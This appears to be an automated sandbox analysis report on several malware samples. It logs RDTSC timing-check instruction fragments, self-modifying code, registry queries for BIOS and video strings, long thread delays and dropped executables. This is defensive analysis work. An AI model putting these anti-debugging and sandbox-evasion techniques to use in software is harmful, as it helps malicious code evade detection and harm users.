Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71158B second address: 711597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA3F4E97196h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 711597 second address: 7115A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4513F2Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 7115A9 second address: 7115AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 711702 second address: 711736 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA3F4513F28h 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007FA3F4513F36h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jc 00007FA3F4513F28h 0x00000019 push edx 0x0000001a pop edx 0x0000001b push esi 0x0000001c jnc 00007FA3F4513F26h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 711736 second address: 711746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 ja 00007FA3F4E97196h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 711888 second address: 71188E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71188E second address: 711893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 711893 second address: 711899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 711899 second address: 7118AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4E9719Fh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 715A01 second address: 715A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 715B07 second address: 715B55 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 ja 00007FA3F4E971A4h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jmp 00007FA3F4E971A0h 0x00000019 jmp 00007FA3F4E971A5h 0x0000001e popad 0x0000001f mov eax, dword ptr [eax] 0x00000021 push ebx 0x00000022 push edi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 715C5C second address: 715C61 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 715C61 second address: 715C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FA3F4E9719Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 715C73 second address: 715C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 715C77 second address: 715C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 6E0A3F second address: 6E0A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71D818 second address: 71D84D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA3F4E971A3h 0x00000008 jmp 00007FA3F4E9719Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA3F4E971A8h 0x00000014 jnl 00007FA3F4E97196h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71D84D second address: 71D851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71DAE5 second address: 71DAEF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA3F4E97196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71ED6D second address: 71ED73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71EE63 second address: 71EE68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71EE68 second address: 71EE6D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71EF0B second address: 71EF11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71F525 second address: 71F534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007FA3F4513F26h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71F642 second address: 71F65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA3F4E971A2h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71F894 second address: 71F8AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 jnc 00007FA3F4513F2Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71FACC second address: 71FB0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FA3F4E97198h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push esi 0x00000029 movsx esi, di 0x0000002c pop esi 0x0000002d push eax 0x0000002e pushad 0x0000002f pushad 0x00000030 pushad 0x00000031 popad 0x00000032 push esi 0x00000033 pop esi 0x00000034 popad 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 71FFAE second address: 71FFCF instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA3F4513F2Ch 0x00000008 jp 00007FA3F4513F26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA3F4513F2Eh 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 7207D9 second address: 7207DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 7207DF second address: 720801 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3F4513F38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 720801 second address: 720812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3F4E9719Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 720812 second address: 720817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 7206E7 second address: 7206EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 7206EB second address: 7206F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 721822 second address: 721828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 722C77 second address: 722C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 722C7B second address: 722CDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FA3F4E97198h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D2520h], ecx 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D2CF9h], ecx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007FA3F4E97198h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 00000019h 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push esi 0x00000050 jp 00007FA3F4E97196h 0x00000056 pop esi 0x00000057 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 722CDF second address: 722CE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 723820 second address: 723843 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jmp 00007FA3F4E971A3h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 724E0D second address: 724E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 724E11 second address: 724E27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FA3F4E9719Ch 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 724E27 second address: 724E2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 724EC1 second address: 724ED9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3F4E971A4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 729271 second address: 729277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 729277 second address: 72927B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 72927B second address: 7292E2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA3F4513F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FA3F4513F28h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D2510h], ebx 0x0000002f push 00000000h 0x00000031 mov dword ptr [ebp+122D29C0h], ecx 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007FA3F4513F28h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 00000015h 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 xchg eax, esi 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe RDTSC instruction interceptor: First address: 7292E2 second address: 7292E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe Special instruction interceptor: First address: 9BCCE6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\p199AjsEFs.exe Special instruction interceptor: First address: B61567 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\p199AjsEFs.exe Special instruction interceptor: First address: 9BA3DA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\p199AjsEFs.exe Special instruction interceptor: First address: B86F34 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\p199AjsEFs.exe Special instruction interceptor: First address: B68532 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\p199AjsEFs.exe Special instruction interceptor: First address: BEB801 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Special instruction interceptor: First address: 57FA9A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Special instruction interceptor: First address: 715AAD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Special instruction interceptor: First address: 71422C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Special instruction interceptor: First address: 74061E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Special instruction interceptor: First address: 57F98B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Special instruction interceptor: First address: 7A73ED instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Special instruction interceptor: First address: B2EB75 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Special instruction interceptor: First address: D4FD35 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 24EB75 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 46FD35 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Memory allocated: 1480000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Memory allocated: 1AFE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Code function: 4_2_051B0CB9 rdtsc 4_2_051B0CB9
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1330 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1219 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 420 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1346 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1345 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1046 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1005 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\libGLESv2.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\uxtheme_2.drv (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\Qt5PrintSupport.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6SD2B.tmp\_isetup\_isdecmp.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\msvcr100.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-DFNTB.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-RHTN2.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\msvcp100.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-29I1I.tmp\_isetup\_iscrypt.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-56BQJ.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\uninstall\unins000.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-4B81S.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-29I1I.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-RHTN2.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\icuuc51.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-5TPVM.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\uninstall\is-GPTU0.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\Qt5Concurrent.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\icuin51.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-H4609.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-RHTN2.tmp\_isetup\_isdecmp.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-IPK0L.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6SD2B.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-3OCBE.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6SD2B.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-29I1I.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\is-0867F.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\libEGL.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-SE3IR.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-UO9UR.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-DIKDD.tmp Jump to dropped file
